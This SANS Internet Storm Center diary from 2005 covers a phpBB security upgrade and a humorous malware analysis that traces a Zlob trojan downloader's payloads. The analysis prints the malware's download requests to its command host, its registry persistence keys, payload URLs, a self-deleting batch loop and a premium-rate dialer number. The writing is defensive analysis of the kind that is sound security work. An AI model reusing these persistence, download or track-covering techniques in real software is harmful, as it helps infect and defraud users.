Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-20 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Google Strangeness: Is It New?; Filthy Minkey; New phpBB; FTBM VII: Afterglow

Published: 2005-07-20
Last Updated: 2005-07-21 17:09:42 UTC
by Tom Liston (Version: 1)
0 comment(s)

Google Strangeness: Is It New?


While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.



I was talking to the Gypsy and his filthy minkey...


If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for a remote file viewing exploit is forthcoming. More info is available at the GreaseMonkey site:



http://greasemonkey.mozdev.org/


phpBB 2.0.17 released


This newest release fixes some security issues due to XSS and adds some new functionality.



URLs:

Announcement:

- http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=308490

Tutorial for heavily modded boards:

- http://www.phpbb.com/phpBB/viewtopic.php?t=308426

Downloads:

- http://www.phpbb.com/downloads.php



Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:



1. Make backup
# cp -r <forum> <backup>

2. make sure the backup is offline (contains vulnerable code)
# chmod 0 <backup>

3. Patch the files

Patching or copying of the replacement files.
Modded boards need to do this very carefully.

admin/admin_ug_auth.php
- the pending list for groups.

admin/admin_users.php
- escaping of the username

includes/bbcode.php
- the XSS issue:
less liberal acceptance of exotic chars in URLs
will break I18N domain names (might not be that bad after all)
[Funny, I remember this code being change in 2.0.16 as well]
still it seems to match now (e.g.)
#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is
which still allows a lot to match to something of the format of
[url=xxxx://www.phpbb.com]phpBB[/url]

includes/functions.php
- unclear, my knowledge of php & their code is lacking

diff:
9c9
< * $Id: functions.php,v 1.133.2.35 2005/07/19 20:01:11 acydburn Exp $
---
> * $Id: functions.php,v 1.133.2.34 2005/02/21 18:37:33 acydburn Exp $

120c120
< if (!is_numeric($user) || $force_str)
---
> if (intval($user) == 0 || $force_str)

581c581
< define('HAS_DIED', 1);
---
> define(HAS_DIED, 1);

includes/functions_validate.php
- call clean function instead of
user name length limit (25 char) and escaping of single quotes.

includes/usercp_activate.php
- add test to see if the admin is doing the activation when needed

includes/usercp_viewprofile.php
- adding username in the search functionality of the
viewprofile control panel

privmsg.php
- big changes in handling of deletion of messages it seems

templates/subSilver/faq_body.tpl
- change a href from "#Top" to "#top"
Doing this properly would require making this change in ALL
installed templates, not just in subSilver. If you changed or
added templates this can be hard.

viewtopic.php
- adding username in the search functionality

4. copy script (kills board)
# cp -r <src dir>/contrib <forum>
# cp -r <src dir>/install <forum>

5. run database update script
http://<site>/<forum>/install/update_to_latest.php

6. remove script
# rm -r <forum>/contrib
# rm -r <forum>/install

7. test and get back in business.


Follow the Bouncing Malware VII: Afterglow



Disclaimer:



Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:



If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.



Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.



Daily.



If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.

The story thus far:



(The Reader's Digest version is below, or, you can read the full thing here: )



Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.



Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.



Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)



As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...



Notes/Feedback from FTBM VI:



1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...



2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.



3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:




Old books can be indecent books,
Though recent books are bolder.
For filth, I'm glad to say,
Is in the mind of the beholder.
When correctly viewed,
Everything is lewd...
--Tom Lehrer, "Smut"


4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.

Afterglow:



While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests, that it formulates based on this data:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so

|HP7081700.so|P7091300.so|S7081700.so

0



that it downloaded in a request to "info.php" on fhgstr.com.



These nine GET requests look like this:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=

3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache



and, in fact, this downloads the first file, M7081700.so.



M7081700.so is a 7588 byte long executable, that is, once again, packed with FSG. When it is launched, it copies itself to:



Windows\System32\msole32.exe



and creates two registry keys:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



and populates the "run" key with a value entitled "winlogon.exe", which actually points to "msole32.exe".



Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:



Critical System Error!
Please read this message carefully.
Your PC is infected by spyware.
You must improve your PC security and system perfomance by deleting
spyware from your operating system.
Click the icon to remove spyware.

Attention! Failure to delete spyware from your PC can reslut in damage
of system resources and your personal files corruption.
Use special software to remove spyware and adware from your computer.
Click "OK" to get all available Anti Spyware software.

System Warning! 4 Errors found:
-Your computer has slowed down
-Your Internet connection speed has decreased
-You get popups and annoying ads when you're online or sometimes even offline
-Your default home page has been changed to the one you didn't ask for
Click "OK" to download spyware scan and delete infected files.

System perfomance notice.
Perfomance of your system is extremely low.
The main reason is adware popups. To improve perfomance of your PC you
have to remove or block popup's source from operating system.
Please, use special software to remove adware materials from your computer.
Click "OK" to get full list of available "PopUp Blocking" software.

Critical System Error!
Please read this message carefully.
System detected virus activities. They may cause critical system
failure. Please,use antivirus software to clean and protect your
system from viruses and parasite programs.
Click "OK" to get all available software.

System Alert: Spyware Detected
System has detected 4 active spyware applications that may cause frequent
application crashes, instability or low
computer perfomance.
Click the icon to remove spyware.

System Alert: Popups
Your PC is infected with popups adware (OHPE ver 4.12_23).
Click the icon to get all available anti popup software.
Click the icon to remove spyware.

Security Alert!
System encountered spyware that gathers your private information without
your consent. This information includes passwords, credit card details
and other private data.

Urgent System Message: Virus!
Your computer was infected with last version of internet
worm (iworm_attck_v122.02a). It is highly recommended that you install
antivirus software.
Click the icon for more information.

System Alert: Adware & Spyware
Your computer has slowed down. Your Internet connection speed has decreased.
You receive more spam emails than ever. Use Spyware scan to find
out the reason
Click the icon to remove spyware.


Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?



"I am malware, therefore, you are infected"



(With sincere apologies to Rene Descartes)



Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).



And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...



'Nuff said.



The next piece o' malware on today's hit parade is K7111600.so, a 4,611 byte long, executable that (for once!) isn't packed or obfuscated in any way.



Cracking this one open, reveals a couple of interesting strings:



http:/ez-finder.com/avg.exe

http:/ez-finder.com/dd.exe

SOFTWARE\AntivirusGold

COMSPEC



@echo off

:start

echo > %1

del %1

if exist %1 goto start

del %0



(note: the links have been slightly altered)

Seems that AntivirusGold is a popular product among malware authors...



The second half of those strings is actually a small DOS batch file that attempts to kill off a particular file, the name of which is passed as a command line parameter. If the file doesn't delete, it simply loops back around and tries again. Once the deletion succeeds, it then deletes itself.



This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't) an executing file cannot be deleted, because it is memory mapped by the operating system and locked from removal. By setting up a looping batch file like this, continually attempting to delete their main executable, when the main program ends, the whole shootin' match disappears.



What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ex-finder.com:



avg.exe: 2,663,231 bytes

dd.exe: 36,864 bytes



I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.



DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe" a 14,848 byte long executable from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that the file that is being downloaded, X.exe, is only about 10K larger than the DA7021900.so downloader... so what is the advantage of using the downloader? Obviously, it would be possible for the malware folks to substitute another file for X.exe, but at the time of writing, this ain't the brightest move they've made.



X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.



So... what's the score-card look like so far? While Joe is watching his movie, he's been treated with the installation of nine pieces of software, three of which we've examined in detail:



M7081700.so - 7,588 bytes

K7111600.so - 4,611 bytes

DA7021900.so - 4,099 bytes

X7081700.so - 2,716 bytes

Z7121900.so - 2,600 bytes

A6291400.so - 34,819 bytes

HP7081700.so - 39,396 bytes

P7091300.so - 21,088 bytes

S7081700.so - 18,036 bytes



The programs that we investigated today installed:



avg.exe - 2,663,231 bytes

dd.exe - 36,864 bytes

X.exe - 14,848 bytes



Joe's dial up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.



But he did get AntivirusGold installed on his machine for free. So how bad could it all be?



Just wait......



-------------------------------------------------------------------------

Handler on Duty: Tom Liston (
http://www.intelguardians.com )
Keywords:
0 comment(s)
Diary Archives